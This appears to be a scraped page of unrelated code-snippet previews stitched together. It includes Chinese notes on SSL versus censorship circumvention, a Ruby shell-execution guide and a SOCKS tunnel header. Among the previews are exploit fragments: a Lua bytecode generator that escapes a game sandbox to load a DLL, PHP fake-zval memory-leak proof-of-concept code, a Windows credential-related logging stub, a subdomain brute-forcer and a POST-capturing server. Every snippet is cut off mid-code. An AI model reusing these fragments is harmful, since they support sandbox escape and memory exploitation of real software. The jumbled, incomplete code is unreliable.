SSL 设计目标:
- 防内容篡改
- 防冒充服务器身份
- 加密通信内容
而翻墙的目标:
- 不被检测出客户端在访问什么网站
- 不被检测出服务器在提供翻墙服务
# Ways to execute a shell script in Ruby | |
# Example Script - Joseph Pecoraro | |
cmd = "echo 'hi'" # Sample string that can be used | |
# 1. Kernel#` - commonly called backticks - `cmd` | |
# This is like many other languages, including bash, PHP, and Perl | |
# Synchronous (blocking) | |
# Returns the output of the shell command | |
# Docs: http://ruby-doc.org/core/classes/Kernel.html#M001111 |
/*********************************************************************** | |
* connect.c -- Make socket connection using SOCKS4/5 and HTTP tunnel. | |
* | |
* Copyright (c) 2000-2006 Shun-ichi Goto | |
* Copyright (c) 2002, J. Grant (English Corrections) | |
* Copyright (c) 2010, Reini Urban (added realm to http_auth basic) | |
* | |
* This program is free software; you can redistribute it and/or | |
* modify it under the terms of the GNU General Public License | |
* as published by the Free Software Foundation; either version 2 |
package se.wendt.statoil.mastercard; | |
import java.util.ArrayList; | |
import java.util.concurrent.CountDownLatch; | |
import redis.clients.jedis.Jedis; | |
import redis.clients.jedis.JedisPubSub; | |
public class JedisTest { |
SSL 设计目标:
而翻墙的目标:
#include <windows.h> | |
#include <stdio.h> | |
#include <WinInet.h> | |
#include <ntsecapi.h> | |
void writeToLog(const char* szString) | |
{ | |
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
if (NULL == pFile) | |
{ |
The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt
, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.
if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
error("This generator requires a 32-bit version of Lua 5.1")
end
local function outer()
local magic -- In bytecode, the stack slot corresponding to this local is changed
#!/usr/bin/env ruby | |
# | |
## Brute code stolen form: https://gist.github.com/petehamilton/4755855 | |
# | |
@domain = 'contoso.com' | |
def result?(sub) | |
results = %x(dig +noall #{sub}.#{@domain} +answer) |
import SimpleHTTPServer | |
import SocketServer | |
PORT = 8000 | |
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
def do_POST(self): | |
content_len = int(self.headers.getheader('content-length', 0)) | |
post_body = self.rfile.read(content_len) |
<?php | |
for ($i=4; $i<100; $i++) { | |
var_dump($i); | |
$m = new StdClass(); | |
$u = array(1); | |
$m->aaa = array(1,2,&$u,4,5); | |
$m->bbb = 1; | |
$m->ccc = &$u; |
<?php | |
$fakezval = pack( | |
'IIII', //unsigned int | |
0x08048000, //address to leak | |
0x0000000f, //length of string | |
0x00000000, //refcount | |
0x00000006 //data type NULL=0,LONG=1,DOUBLE=2,BOOL=3,ARR=4,OBJ=5,STR=6,RES=7 | |
); | |
//obj from original POC by @ion1c |